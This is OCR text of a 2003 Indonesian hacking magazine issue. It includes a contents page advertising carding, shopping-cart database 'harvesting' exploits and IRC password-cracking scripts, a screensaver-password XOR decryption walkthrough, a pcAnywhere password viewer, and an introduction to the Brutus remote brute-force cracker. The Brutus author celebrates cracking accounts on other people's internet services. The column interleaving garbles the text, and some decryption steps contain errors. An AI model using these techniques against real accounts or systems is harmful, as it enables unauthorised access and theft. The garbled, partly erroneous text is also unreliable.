Documentos de Académico
Documentos de Profesional
Documentos de Cultura
amkm
dari Anda untuk Anda
Permintaan itu makin banyak dan variatif
amkm Salam!
anda Bongkar!
meminta Password sana, password sini.
kami
mendownload
Software gratis
di Internet?
Tapi besarnya...
50Mb... 200Mb?
sa—elephant • Perangkat lunak password cracker Brutus dapat digunakan untuk mengetahui kata
sandi komputer dari jarak jauh (remote computer) lewat sambungan Internet. Anda
cukup memasukkan IP komputer sasaran. Hasilnya dapat anda lihat di atas. Baca
www.neotek.co.id
Situs NeoTek neotek.kpone.com.sg 31 Mengais Password
Nick & Channel IRC
Wicked IRC Password Cracker
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
dapat digunakan untuk membongkar
Link Langsung Layanan Rupa-rupa NeoTek kata sandi nick dan channel di IRC.
Kunjungi situs-situs yang dibahas di Perlengkapan berinternet dari situs NeoTek
majalah NeoTek dengan sekali klik
Skrip Pembongkar
lewat situs NeoTek. Channel #neoteker di Dalnet
Ngobrol ramai-ramai sesama NeoTeker 34 Password Nick
NeoTek versi PDF Web Chat Room Gunakan skrip yang dapat dita-
Kehabisan NeoTek di kota Anda? Kini tidak usah jauh-jauh untuk ngobrol namkan di komputer orang lain untuk
Dapatkan saja versi PDF-nya. Gratis! langsung dengan sesama NeoTeker membongkar password nick di IRC.
Mailing List
Download Bongkar Paksa
Tersedia juga download di situs
NeoTek selain dari situs aslinya
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet! 36 Password Nick
NeoTeker Official Portal Metode brute force digunakan
http://neotek.portal.dk3.com untuk membongkar password nick dan
Situs komunikasi antar Neoteker. channel di IRC.
NeoSoft
FOKUS BULAN INI Netscape 7.0
0 Versi terakhir browser pe-
saing Internet Explorer ini
dilengkapi fitur-fitur baru
yang berguna untuk
aktivitas Internet anda.
NeoProfil
Kru NeoTek
3 Bermarkas di
Gedung Cahaya Palmerah 503
Mengusung Jl. Palmerah Utara III No. 9
Jakarta 11480
VoIP Merdeka Telp. 021-5481457
Fax. 021-5329041
Pemimpin Umum
e-Commerce Security:
NeoTekno 28 Modus Operandi Carding
Fachri Said
Pemimpin Redaksi
Mengamati ‘dari dalam’ cara
Kosasih Iskandarsjah
kerja carder yang mencakup pencurian
VoIP Merdeka database selain credit card fraud. Redaktur Ahli
14 Membangun Telkom Onno W. Purbo
Michael S. Sunggiardi
Sendiri e-Commerce Security:
Teknologi open source sekarang sudah 30 Kelemahan cart32.exe Pemimpin Usaha
memungkinkan kita membangun jaringan Bahasan teknis cara ‘memanen’ Fahmi Oemar
telepon sendiri, baik itu berjalan terpisah database dari aplikasi shopping cart Ridwan Fachri
maupun diintegrasikan dengan jaringan yang populer, cart32..exe. Shoppinmg Redaktur Pelaksana
telkom yang ‘resmi.’ Bahasan komprehensif cart ini mempunyai kelemahan fatal. Gianto Widianto
baik untuk pemakai biasa maupun pe- Dadi Pakar
nyedia fasilitas VoIP gateway. e-Commerce Security:
Proyek Digital Clock (5)
32 Kelemahan shopper.cgi
Sekretaris Redaksi
Elvy Risma Nainggolan
18 Artikel lanjutan advanced digital
Eksploitasi aplikasi shopping
cart dengan memanfaatkan unicode
Dewan Redaksi
clock berupa penjelasan cara David Sugianto,
bug untuk ‘memanen’ database yang
kerja program NeoClock2.asm. Asmuri Anwar, MA Rody C.
ada di dalamnya.
Webmaster
NeoTek Maret 2003 Supriyanto
Inbox Perl dan Perl Exploit
Pemasaran
Hedhi Sabaruddin
NmN Exploit selain dalam format C,
6 Neoteker menjawab Neoteker
Khusus VoIP Merdeka
banyak juga yang tersedia sebagai
Perl script. Pelajari Perl (pada
Tuti Sundari, Arinto
Iklan dan Promosi
Windows maupun Linux) sebelum Elvy Risma Nainggolan
NeoRagam mencoba exploit-nya. Keuangan
Aswan Bakri
Ada Apa di CD NeoTek? Menjebol Forum
4 Linux Pocketbook 2003 PHP Bulletin Board
VoIP Merdeka Selain aplikasi portal seperti PHP Bank
Nuke atau Postnuke, masih banyak
Bank BNI
Daftar Isi CD NeoTek terdapat aplikasi lain yang berbasis
5 PHP, seperti misalnya phpBB (PHP
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001
Bulletin Board) ini. Sayang, aplikasi-
aplikasi ini tidak luput dari vulner- Bank BCA KCP Rawamangun
abilities sehingga rawan dijebol. a.n. Aswan Bakri
No. rekening 0940544131
NmN
Khusus VoIP Merdeka
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.
VoIP Perjuangan nya berupa sebuah HP Net- atau handphone dari nomor atau gimana?
Kang Onno Server Pentium Pro 200 de- voip? Vice versa ??? Wahyu Budi
ngan memory 128Mbyte
Posted January 8 dengan harddisk 2Gbyte Terima kasih en maaf kalo wbudi@satelindo.co.id
Maaf nyepam :( ... menjalankan Linux Man- nyerocos ... maklum... udik ;)
J: Posted January 8
Atas rahmat Allah SWT. drake 9.0 dengan openh323 Sulchan
gatekeeper 2.0.2. Tul jadi 0111542
Atas perjuangan rekan Johar msdarmawan@clivarindo.org
Alam dan Adi di IIX. Atas Yah mudah-mudahan bisa Onno W. Purbo
sumbangan dan dukungan J: Posted January 8
membantu sedikit meringan-
rekan-rekan APJII & IIX kan penderitaan bangsa > apakah yg saya lakukan T: Posted January 8
Indonesia ... udah benar? Sesuai usulan rekan-rekan
Pada siang ini 8 January 2003
Betul .. terutama di Genetika, Ja-
Gatekeeper APJII di IIX dengan Sekali lagi terima kasih ba- ringan VoIP Perjuangan
nomor IP [202.148.63.18] nyak sekali untuk rekan Johar > kalo saya sudah registrasi diusukan berganti nama
yang didedikasikan untuk Alam, Adi, Heru Nugroho, nomor ini, berarti ini sudah menjadi Jaringan VoIP
registrasi endpoint-endpoint APJII, IIX dll yang rela me- menjadi nomor saya? Atau Merdeka!!! agar tidak
VoIP perjuangan dengan no- ngorbankan resource-nya hanya pada saat online ? dihubungkan dengan partai
mor akses perjuangan 0111 untuk bangsa ini :) ... Hanya pada saat online aja .. yang berkuasa ‘n tidak
xxxxxxxx sudah dapat Onno W. Purbo
> berarti pemilik nomor dipolitisir sebagai usaha partai
beroperasi dan digunakan. Indonesian VoIP MaverickNet:
voip harus online 24 jam? yang berkuasa. Pengguna
Anda dapat menggunakan 01110214204701 (ITG/home) VoIP Merdeka!!! dapat me-
gatekeeper APJII [202.148.63.18] 01110214204701 (laptop/home) Engga juga .. registrasikan diri ke gate-
untuk meregistrasi endpoint 01110214208888 (laptop/mobile) > apakah saya bisa menghu- keeper menggunakan Net-
anda (NetMeeting dll) un- bungi nomor telepon biasa Meeting ke 202.148.63.18,
tuk bisa berkomunikasi me- To the Point, Aja... atau handphone dari nomor dengan prefix 0111888.
lalui Internet dan tergabung T: Posted January 8 voip? Vice versa? Mohon menggunakan prefix
dalam jaringan VoIP perjuangan. To the point Pak Onno, saya Kalau ada gatewaynya bisa .. 0111888 untuk nomor
Saya yakin pengorbanan melakukan sbb: telepon enduser supaya para
Onno W. Purbo operator gatekeeper tidak
yang dilakukan oleh APJII 1. Dial-up menggunakan
dan IIX akan sangat mem- onno@indo.net.id pusing kepala melakukan
telkomnet
bantu rekan-rekan yang 2. open netmeeting (tools - routing nomor telepon-nya ..
sangat mendambakan tele- Untuk Luar Negeri? Merdeka!!!
options-advanced calling)
pon via Internet dengan tarif 3. gatekeeper setting: T: Posted January 8 Onno W. Purbo
amat sangat murah. Sialnya, • use gatekeeper to place Apa gatekeeper ini bisa dipake Advertisement
mohon dicatat bahwa jaring- calls (checked) saya isi juga sama orang yang tinggal Posted January 12
an 0111 ini tidak bisa dihu- 202.148.63.18 di luar negeri? Contohnya di
bungi dari Telkom, maklum • log on using my account Belanda/ Jerman. Maksudnya Hasil diskusi para operator
kan jaringan ini hanya ja- name (unchecked) biar gampang konek dan bisa gatekeeper VoIP Merdeka!!!
ringan VoIP perjuangan :) • og on using my phone online sama sama.. • area code tidak boleh ada
Yah, tapi lumayanlah buat number (checked) saya angka NOL (takutnya be-
isi 01110218499001 The 10th
ngomong sampe berbusa .. rabe waktu SLI) jadi Jakarta
4. saya coba new call en call- d10th@telkom.net
Kalau ada masalah silahkan ing dua nomor pak onno, 011121, Bandung 011122
complain kepada saya :( .. J: Posted January 8 • pengguna NetMeeting
kayaknya pak onno lagi
diskusi lebih lanjut silahkan off line ya ??? atau ...?? Engga bisa ..Gatekeeper ini yang log ke
melalui mailinglist adanya di IIX di Indonesia Engga • 202.148.63.18 -
genetika@yahoogroups.com Apakah yg saya lakukan udah gunakan prefix 0111888
benar? Kalo saya sudah diroute buat keluar negeri
panduan/cara menggunakan • 202.159.123.162 -
registrasi nomor ini, berarti Onno W. Purbo gunakan prefix 0111251
jaringan VoIP perjuangan ini sudah menjadi nomor sa-
silahkan dilihat dari pandu- onno@indo.net.id • 202.43.162.189 - sedang
ya? Atau hanya pada saat on- ditanyakan ke yang
an VoIP Perjuangan yang line? Berarti pemilik nomor Kode Area
bisa di download di punya gatekeeper
voip harus online 24 jam? T: Posted January 8
www.bogor.net/idkf/ Onno (0111214204701 -
Sedikit informasi teknis me- Apakah saya bisa menghu- Klo yg kode area-nya pake
sin gatekeeper APJII ini ha- bungi nomor telepon biasa 0542, apakah jadi 542 aja Answering Machine)
PASSWORD CRACKING
ada Sistem Operasi Windows banyak
P aplikasi yang membutuhkan password.
Anehnya, sebagian aplikasi tersebut
tetap meninggalkan karakter password pada
PASSWO R D C R AC K I N G
Membongkar Enkripsi
Screensaver Password
NeoTek September 2002 telah membahas cara meng-crack screensaver password dengan bantuan
e. Kini David Sugianto (davidsugianto2002@yahoo.com) mengajak anda
program 95sscrk.exe
melakukan cracking secara manual. Cracking ini menggunakan bantuan kode ASCII.
ENGAPA ANDA PERLU MENGUASAI CARA meng-crack sebelumnya, centang kotak check box Password pro-
M kata sandi screensaver? Karena jika komputer ter-
pasang screensaver yang dilengkapi dengan kata
tected. Lalu klik tombol Change di sebelahnya.
6. Masukkan password yang anda inginkan pada kedua
sandi, dan sewaktu-waktu anda lupa akan kata sandi ter- kotak yang tersedia. Dikedua kotak tersebut, anda ha-
sebut, maka anda tidak akan dapat masuk ke desktop rus mengetikkan kata sandi yang sama. Karena saya
Windows tersebut dan harus me-restart ulang komputer akan membahas mengenai cara cracking kata sandi,
lalu menonaktifkan screensaver. Sebenarnya alasan itu mungkin sebaiknya kata sandi kita samakan terlebih
kurang masuk akal, bagi saya pribadi alasan mempelajari dahulu agar mudah memahaminya. Kata sandi yang
cracking screensaver adalah hanya untuk kesenangan. saya gunakan adalah “DAVID.” Harap diingat kata
Karena saya menganggap cracking itu adalah suatu seni. sandi yang saya gunakan terdiri dari huruf besar
Walaupun artikel ini membahas masalah cracking, namun semua. Klik OK untuk keluar dari kotak tersebut.
bukan berarti artikel ini hanya ditujukan untuk yang su-
dah berpengalaman atau mahir dalam melakukan cracking.
Artikel ini saya buat sebenarnya ditujukan untuk para
pemula yang ingin mencoba terjun ke dunia crack.
Yang dimaksud enkripsi disini ialah bahwa password se- Masih bingung dengan proses perhitungan dengan meto-
benarnya (DAVID) telah dijadikan bilangan HEX atau de XOR hingga mendapatkan hasil tertentu? Kini akan
dienkripsi oleh Windows. Oleh karena itu, untuk menam- saya bahas lebih dalam:
pilkan password yang sebenarnya, kita harus melakukan Bilangan yang akan dibandingkan adalah bilangan biner da-
dekripsi bilangan HEX tersebut. ri 0 yaitu 0000 0000. Lalu saya menggunakan tabel enkripsi
Seperti yang telah anda ketahui, pada saat membuat kata untuk membandingkannya. Tabel enkripsi yang saya guna-
sandi screensaver, saya memberikan password DAVID. kan ialah baris pertama di kolom kiri yaitu 0000 0100.
Kata tersebut terdiri dari 5 karakter. Namun lihatlah kata Mengapa saya mengambil yang berada di baris pertama
sandi yang telah dienkripsi 0CAF205423 terdiri atas 10 pada tabel enkripsi? Karena karakter yang akan kita des-
karakter. Dapat disimpulkan bahwa sepasang bilangan kripsikan ialah karakter pertama, jadi tiap baris mewakili
HEX mewakili setiap karakter yang sesungguhnya. Oleh urutan karakter. Baris 1 untuk karakter pertama, baris ke-
karena itu, kita harus membagi bilangan HEX tersebut 2 untuk karakter ke-2, dsb. Lalu mengapa terdapat kolom
terlebih dahulu dua-dua, yaitu 0C, AF, 20, 54, 23. Atau sebelah kiri dan sebelah kanan? Karena seperti yang su-
dapat juga disimpulkan: dah disebutkan sebelumnya, setiap karakter sebenarnya
0C mewakili D (karakter pertama) diwakili dengan 2 bilangan HEX. Seperti karakter D diwa-
AF mewakili A kili bilangan HEX 0 dan C. Karena kita baru membahas
20 mewakili V bilangan HEX 0, maka tabel enkripsi yang digunakan
54 mewakili I ialah baris pertama dan kolom sebelah kiri.
23 mewakili D (karakter terakhir)
Lalu bagaimanakah cara perhitngan dengan mengunakan
Jika melihat pembagian di atas, maka mungkin timbul per- metode XOR? Sebenarnya caranya cukup mudah, lihatlah
tanyaan: “Mengapa karakter D pertama dan karakter D lagi tabel XOR diatas. Proses perhitungan dilakukan
terakhir tidak diwakili oleh bilangan HEX yang sama (yang dengan cara membandingkan bilangan biner dengan tabel
pertama diwakili 0C dan yang terakhir diwakili 23) padahal enkripsi. Ingat :
sama-sama karakter D?” Jawabnya akan anda temukan jika
anda telah selesai mempelajari cara cracking kata sandi ini. 0 dibandingkan dengan 0 menghasilkan 0,
0 dibandingkan dengan 1 menghasilkan 1,
Dalam cracking kata sandi, sebenarnya banyak langkah yang 1 dibandingkan dengan 0 menghasilkan 1,
harus dilakukan, namun karena artikel ini ditujukan untuk 1 dibandingkan dengan 1 menghasilkan 0,
pemula maka saya akan mempermudahnya.
jika diimplementasikan pada kasus kita,
Dalam meng-crack kata sandi screensaver, akan digunakan
skema enkripsi. Skema tersebut digunakan sebagai per- 0 0 0 0 0 0 0 0 ← dari bilangan biner dari HEX 0
bandingan untuk mengetahui karakter yang sesungguhnya 0 0 0 0 0 1 0 0 ← dari tabel enkripsi
dari bilangan HEX. Daftar skema enkripsi saya sertakan ---------------- ← dihitung menggunakan metode XOR
pada akhir artikel ini. Karena upaya ini melibatkan kode 0 0 0 0 0 1 0 0 ← hasil yang didapat.
ASCII, saya juga menyertakan daftar tabel kode ASCII Kini lihat pada tabel ASCII yang terdapat di belakang
untuk mempermudah anda. artikel ini. Carilah bilangan HEX yang memiliki bilangan
Salah satu metode yang terpenting dalam cracking ialah biner 0000 0100. Bilangan HEX yang didapat ialah 4.
metode XOR. Berikut ini adalah tabel metode XOR: Kini kita telah selesai dengan bilangan HEX 0, dan akan
MasukanA MasukanB Hasil Keluaran dilanjutkan dengan bilangan HEX C. Gunakan cara yang
0 0 0 sama seperti sebelumnya.
0 1 1 C = 0000 1100 ← dari bilangan biner dari HEX C
1 0 1 0000 1000 ← dari tabel enkripsi baris pertama
1 1 0 kolom sebelah kanan.
Lihatlah sekilas tabel tersebut, jika anda masih belum me- ---------------- ← dihitung menggunakan metode XOR
mahaminya jangan khawatir. Saya akan menjelaskannya 0000 0100 ← hasil yang didapat
dalam ketika proses cracking berlangsung. Kini lihat pada tabel ASCII yang terdapat di belakang
Kini kita akan mulai melakukan cracking. Ambil sepasang artikel ini. Carilah bilangan HEX yang memiliki bilangan
bilangan HEX yang pertama dari password yang kita da- biner 0000 0100. Bilangan HEX yang didapat ialah 4.
pat di Registri, yaitu 0C. Dalam proses cracking ini, lihat- Setelah selesai menghitung bilangan HEX 0 dan C, maka
lah tabel ASCII sebagai panduan anda. kita juga selesai mendekripsikan karakter pertama pada
HEX 0 memiliki bilangan biner 0000 0000. kata sandi screen saver. Hasil terakhir yang didapat pada
HEX C atau 0C memiliki bilangan biner 0000 1100 perhitungan bilangan HEX 0 adalah 4, dan hasil pada bi-
langan HEX C adalah 4 juga. Kini gabungkan kedua hasil
Deskripsi karakter ke-1 tersebut yang akan menghasilkan bilangan HEX 44. Pada
tabel ASCII, carilah karakter yang memiliki bilangan
Kini kita akan membahasnya satu persatu dengan meng- HEX 44. Karakter tersebut ialah D. Dan D merupakan ka-
gunakan skema enkripsi untuk mendapatkan karakter rakter pertama kata sandi screen saver saya, mengingat
sesungguhnya. kata sandi screen saver saya yang sesungguhnya ialah
0 = 0000 0000 “DAVID.”
0000 0100 ← didapat dari tabel skema enkripsi
baris pertama, kolom sebelah kiri Deskripsi karakter ke-2
----------------- ← menggunakan metode XOR Setelah berhasil dengan karakter pertama, kini saya akan
0000 0100 ← hasil yang didapat mencoba dengan dekripsi karakter ke-2. Ambil pasangan
bilangan HEX yang kedua, yaitu AF. Tanpa basa-basi kita
Bilangan biner 0000 0100 mewakili bilangan HEX 4. akan langsung menghitung:
A = 0000 1010 ← dari bilangan biner dari HEX A 0000 1101 ← dari tabel enkripsi baris keempat
0000 1110 ← dari tabel enkripsi baris kedua kolom sebelah kanan
kolom sebelah kiri ---------------- ← dihitung menggunakan metode XOR
---------------- ← dihitung menggunakan metode XOR 0000 1001 ← hasil yang didapat.
0000 0100 ← hasil yang didapat. Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lihat pada tabel ASCII yang terdapat di belakang ar- tikel ini. Carilah bilangan HEX yang memiliki bilangan
tikel ini. Carilah bilangan HEX yang memiliki bilangan biner 0000 1001. Bilangan HEX yang didapat ialah 9.
biner 0000 0100. Bilangan HEX yang didapat ialah 4. Gabungkan kedua hasil bilangan HEX yang didapat di
F = 0000 1111 ← dari bilangan biner dari HEX F atas, yang akan menjadi 49. Carilah karakter yang
0000 1110 ← dari tabel enkripsi baris kedua memiliki bilangan HEX 49. Karakter tersebut ialah I.
kolom sebelah kanan Sementara ini, saya telah berhasil mendekripsi 3 karakter
---------------- ← dihitung menggunakan metode XOR pertama dari kata sandi screensaver di komputer saya.
0000 0001 ← hasil yang didapat. Karakter tersebut ialah D, A, V, I.
Kini lihat pada tabel ASCII yang terdapat di belakang
artikel ini. Carilah bilangan HEX yang memiliki bilangan Deskripsi karakter ke-5
biner 0000 0001. Bilangan HEX yang didapat ialah 1. Kita sampai ke karakter terakhir dari kata sandi screen-
Gabungkan kedua hasil bilangan HEX yang didapat di saver. Langsung saja kita hitung lagi dengan pasangan
atas, yang akan menjadi 41. Carilah karakter yang memi- bilangan HEX terakhir yaitu 23.
liki bilangan HEX 41. Karakter tersebut ialah A. 2 = 0000 0010 ← dari bilangan biner dari HEX 2
Sementara ini, saya telah berhasil mendeskripsi 2 karak- 0000 0110 ← dari tabel enkripsi baris kelima
ter pertama dari kata sandi screensaver di komputer saya. kolom sebelah kiri
Karakter tersebut ialah D, A. ---------------- ← dihitung menggunakan metode XOR
0000 0100 ← hasil yang didapat.
Deskripsi karakter ke-3 Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lanjutkan ke karakter ke-3. Ambil pasangan ke-3 dari tikel ini. Carilah bilangan HEX yang memiliki bilangan
bilangan HEX, yaitu 20. Dan mulai menghitung lagi. biner 0000 0100. Bilangan HEX yang didapat ialah 4.
2 = 0000 0010 ← dari bilangan biner dari HEX 2 3 = 0000 0011 ← dari bilangan biner dari HEX 2
0000 0111 ← dari tabel enkripsi baris ketiga 0000 0111 ← dari tabel enkripsi baris kelima
kolom sebelah kiri kolom sebelah kanan
---------------- ← dihitung menggunakan metode XOR ---------------- ← dihitung menggunakan metode XOR
0000 0101 ← hasil yang didapat. 0000 0100 ← hasil yang didapat.
Kini lihat pada tabel ASCII yang terdapat di belakang Kini lihat pada tabel ASCII yang terdapat di belakang ar-
artikel ini. Carilah bilangan HEX yang memiliki bilangan tikel ini. Carilah bilangan HEX yang memiliki bilangan
biner 0000 0101. Bilangan HEX yang didapat ialah 5. biner 0000 1001. Bilangan HEX yang didapat ialah 4.
0 = 0000 0000 ← dari bilangan biner dari HEX 0 Gabungkan kedua hasil bilangan HEX yang didapat
0000 0110 ← dari tabel enkripsi baris ketiga diatas, yang akan menjadi 44. Carilah karakter yang
kolom sebelah kanan memiliki bilangan HEX 44. Karakter tersebut ialah D.
---------------- ← dihitung menggunakan metode XOR Akhirnya, saya telah berhasil mendsekripsi 3 karakter
0000 0110 ← hasil yang didapat. pertama dari kata sandi screensaver di komputer saya.
Kini lihat pada tabel ASCII yang terdapat di belakang ar- Karakter tersebut ialah D, A, V, I, dan D.
tikel ini. Carilah bilangan HEX yang memiliki bilangan Kini saya telah berhasil membongkar kata sandi screen-
biner 0000 0110. Bilangan HEX yang didapat ialah 6. saver yang telah dienkripsi oleh Windows. Mudah ‘kan?
Gabungkan kedua hasil bilangan HEX yang didapat di Yang perlu ditekankan di sini hanyalah ketelitian dan
atas, yang akan menjadi 56. Carilah karakter yang memi- kesabaran.
liki bilangan HEX 56. Karakter tersebut ialah V.
Sementara ini, saya telah berhasil mendeskripsi 3 karak- Tabel Enkripsi Password Screen Saver
ter pertama dari kata sandi screensaver di komputer saya.
Karakter tersebut ialah D, A, V. Baris Ke - Kiri Kanan
1 0000 0100 0000 1000
Deskripsi karakter ke-4 2 0000 1110 0000 1110
Kini lanjutkan ke karakter ke-4. Ambil pasangan ke-4 dari 3 0000 0111 0000 0110
bilangan HEX, yaitu 54. Hitung lagi 4 0000 0001 0000 1101
5 = 0000 0101 ← dari bilangan biner dari HEX 5 5 0000 0110 0000 0111
0000 0001 ← dari tabel enkripsi baris keempat 6 0000 0110 0000 1001
kolom sebelah kiri 7 0000 1010 0000 0001
---------------- ← dihitung menggunakan metode XOR 8 0000 0001 0000 1011
0000 0100 ← hasil yang didapat. 9 0000 0111 0000 1011
10 0000 1000 0000 1100
Kini lihat pada tabel ASCII yang terdapat di belakang ar- 11 0000 0100 0000 0111
tikel ini. Carilah bilangan HEX yang memiliki bilangan 12 0000 1111 0000 1000
biner 0000 0100. Bilangan HEX yang didapat ialah 4. 13 0000 0101 0000 0100
4 = 0000 0100 ← dari bilangan biner dari HEX 4 14 0000 1001 0000 0101
Tabel ASCII (karena keterbatasan halaman, hanya ditampilkan karakter ASCII yang umum digunakan)
HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter
0 0000 0000 2D 0010 1101 - 49 0100 1001 I 65 0110 0101 e
1 0000 0001 2E 0010 1110 . 4A 0100 1010 J 66 0110 0110 f
2 0000 0010 2F 0010 1111 / 4B 0100 1011 K 67 0110 0111 g
3 0000 0011 30 0011 0000 0 4C 0100 1100 L 68 0110 1000 h
4 0000 0100 31 0011 0001 1 4D 0100 1101 M 69 0110 1001 i
5 0000 0101 32 0011 0010 2 4E 0100 1110 N 6A 0110 1010 j
6 0000 0110 33 0011 0011 3 4F 0100 1111 O 6B 0110 1011 k
7 0000 0111 34 0011 0100 4 50 0101 0000 P 6C 0110 1100 l
8 0000 1000 35 0011 0101 5 51 0101 0001 Q 6D 0110 1101 m
9 0000 1001 36 0011 0110 6 52 0101 0010 R 6E 0110 1110 n
A 0000 1010 37 0011 0111 7 53 0101 0011 S 6F 0110 1111 o
B 0000 1011 38 0011 1000 8 54 0101 0100 T 70 0111 0000 p
C 0000 1100 39 0011 1001 9 55 0101 0101 U 71 0111 0001 q
D 0000 1101 3A 0011 1010 : 56 0101 0110 V 72 0111 0010 r
E 0000 1110 3B 0011 1011 ; 57 0101 0111 W 73 0111 0011 s
F 0000 1111 3C 0011 1100 < 58 0101 1000 X 74 0111 0100 t
21 0010 0001 ! 3D 0011 1101 = 59 0101 1001 Y 75 0111 0101 u
22 0010 0010 " 3E 0011 1110 > 5A 0101 1010 Z 76 0111 0110 v
23 0010 0011 # 3F 0011 1111 ? 5B 0101 1011 [ 77 0111 0111 w
24 0010 0100 $ 40 0100 0000 @ 5C 0101 1100 \ 78 0111 1000 x
25 0010 0101 % 41 0100 0001 A 5D 0101 1101 ] 79 0111 1001 y
26 0010 0110 & 42 0100 0010 B 5E 0101 1110 ^ 7A 0111 1010 z
27 0010 0111 ' 43 0100 0011 C 5F 0101 1111 _ 7B 0111 1011 {
28 0010 1000 ( 44 0100 0100 D 60 0110 0000 ' 7C 0111 1100 |
29 0010 1001 ) 45 0100 0101 E 61 0110 0001 a 7D 0111 1101 }
2A 0010 1010 * 46 0100 0110 F 62 0110 0010 b 7E 0111 1110 ~
2B 0010 1011 + 47 0100 0111 G 63 0110 0011 c
2C 0010 1100 , 48 0100 1000 H 64 0110 0100 d
PC ANYWHERE PASSVIEW
agaimana kalau anda lupa dengan
B password anda sendiri sehingga
tidak bisa mengakses host ataupun
mengubah konfigurasi pada komponen-
Kini tidak perlu lagi khawatir bila anda lupa dengan password pcAnywhere anda.
2
PCANYWHERE PASSVIEW ACCESS PASSWORD KONFIGURASI KOMPONEN
1 Double click pada icon PCAnypass
yang akan menampilkan jendela
2 Password dari user kosasih untuk
akses ke pcAnywhere host tersim-
3 Setiap komponen pada pcAnywhere,
baik untuk host maupun client, da-
PCAnywhere PassView. Klik tombol pan dalam komponen PCA kosasih. pat dikonfigurasi. Password digu-
Get Password dan masuk ke folder Setelah Get Password, Open nakan agar konfigurasi ini tidak
pcAnywhere. Akan tampak kom- komponen PCA kosasih untuk diutak-atik orang. Password ini pun
ponen-komponen yang dapat di- menampilkan user name dan dapat diungkapkan dengan mudah.
periksa keberadaan password-nya. password-nya.
PASSWO R D C R AC K I N G
Remote Computer
dengan Brutus
Password cracking umumnya mensyaratkan kita mendapatkan akses langsung pada komputer
penyimpan password (local console) seperti pada screen saver pasword, cached password,
maupun file pwl. Untuk remote computer dapat digunakan Brutus. Eryanto Sitorus
(ery@postmaster.co.uk) membahasnya untuk anda.
EBERAPA HARI YANG LALU, KIRA-KIRA 15 MENIT sebe- tidak visible, maka hal yang sama juga berlaku bagi para
B lum jam pulang kantor, seorang rekan kerja saya
yang sangat expert dibidang akuntansi keuangan,
hacker, phreaker, atau mereka yang menyukai password
cracker. Memeriksa, melacak, atau usaha-usaha untuk meng-
bertanya seperti ini, “Gue bingung deh, apa sih asyiknya crack kata sandi (password), tentu saja merupakan peker-
hacking, phreaking, dan cracking? Apa kamu enggak jaan yang sangat mengasyikkan dan sekaligus menantang.
pernah merasa bersalah dan bosan melakukan itu?” Sam- Dan begitu kita berhasil meng-crack sejumlah kata sandi
bil menarik sebatang rokok Marlboro yang masih tersisa dari beberapa layanan (services) Internet milik orang lain,
5 batang lagi, saya balas bertanya, “Ente sendiri? Apa maka tidak ada hal yang lebih memuaskan dari pada itu.
enggak jenuh ngurusi akuntansi setiap hari? Hari-hari Anda tidak percaya? Silakan membuktikannya sendiri.
yang lo lacak (audit) uang melulu…apa kagak bosan tuh?" Saat ini, kita semua tentunya sudah menyadari, bahwa
Terus terang saja, saya menanyakan itu karena saya sen- seiring dengan kian meningkatnya jumlah pengguna In-
diri juga sering merasa heran setiap kali melihatnya begi- ternet yang terhubung ke server-server jaringan Internet
tu asyik dengan pekerjaannya, sampai lupa waktu. Kalau secara global, maka jumlah account (username dan pass-
beliau sedang melacak (mengaudit) laporan keuangan, word) yang bisa di-crack pun semakin meningkat dan
maka jangan harap dia bisa diajak talking, jalan-jalan, atau bertambah banyak (bervariasi), termasuk jumlah orang
makan, sekalipun yang mengajaknya itu adalah pacar-nya yang menyukai tantangan untuk mendapatkan account-
sendiri. Tapi apabila suatu waktu dia tiba-tiba berteriak account tersebut. Beberapa account penting yang layak
“Yes!” karena berhasil dan sukses melacak sejumlah ang- dan menarik untuk di crack, diantaranya adalah account
ka yang menyebabkan laporan keuangan yang diterima- untuk: HTTP (Website), POP3 (email), FTP, Shell, IRC
nya dari beberapa kantor cabang tidak klop, maka itu ber- (nick dan channel), ICQ, SMB (NetBIOS), IMAP, NNTP,
arti rezeki buat saya. Lihat saja, dia pasti tidak akan lupa dan masih banyak yang lainnya. Nah, karena sudah me-
untuk mentraktir makan Kwetiau Goreng. Sudah ke- nyangkut masalah teknis dan agak terkesan rumit, lalu di
nyang, dapat dua bungkus Marlboro lagi. Asyik banget! benak kita kemudian muncul satu pertanyaan, yakni: apa
Apa yang saya ceritakan tersebut di atas adalah sekedar yang harus saya lakukan atau pelajari agar saya bisa
ilustrasi, bahwa secara teoretis, kita bisa mengasumsikan meng-crack account masing-masing layanan (services)
hacker, phreaker, dan cracker sebagai suatu profesi atau tersebut di atas?. Jika itu adalah termasuk salah satu mo-
simbol status yang tidak kalah penting seperti seorang del pertanyaan yang akan anda ajukan, maka saya akan
akuntan professional. Jika seorang akuntan menyukai tan- menjawabnya seperti ini: Gampang koq, pakai saja cara
tangan untuk memburu angka-angka yang mereka anggap instant!. Dengan begitu maka anda tidak perlu mengha-
• Gambar 1: Search target host yang akan di-crack. • Gambar 2: Tentukan tipe layanan yang akan di-crack.
biskan waktu untuk mempelajari sesatu yang (katakan- • HTTP (Basic Authentication) • Telnet
lah) bagi anda sangat tidak memungkinkan dan tidak ma- • HTTP (HTML Form/CGI) • IMAP
suk akal. Yah, menurut saya itu jauh lebih bermanfaat • POP3 • NNTP
daripada nantinya anda ketinggalan informasi dan kehi- • FTP • NetBus
langan kesempatan.
• SMB
Dari sekian banyak perangkat lunak yang dapat melaku- Bagi anda yang tertarik ingin menggunakan Brutus, sila-
kan tugas tersebut di atas, ada satu buah software pass- kan menginstal terlebih dahulu dari dalam CD NeoTek
word cracker yang layak untuk anda pertimbangkan, yai- nomor ini. Atau anda juga bisa mengambilnya langsung
tu Brutus, yang diciptakan pada akhir tahun 1998 yang dari alamat situs pembuatnya di www.hoobie.net.
lalu. README file menyebutkan, “Brutus is one of the
fastest, most flexible remote password crackers you can Mengoperasikan Brutus
get your hands on—it's also free. It is available for Win- Mengoperasikan Brutus sama sekali tidak sulit. Anda cu-
dows 9x, NT and 2000, there is no UN*X version avail- kup menentukan alamat IP atau target host beserta tipe
able although it is a possibility at some point in the future. layanan yang akan anda crack, seperti terlihat pada
Brutus was first made publicly available in October 1998 Gambar 1.
and since that time there have been at least 70,000
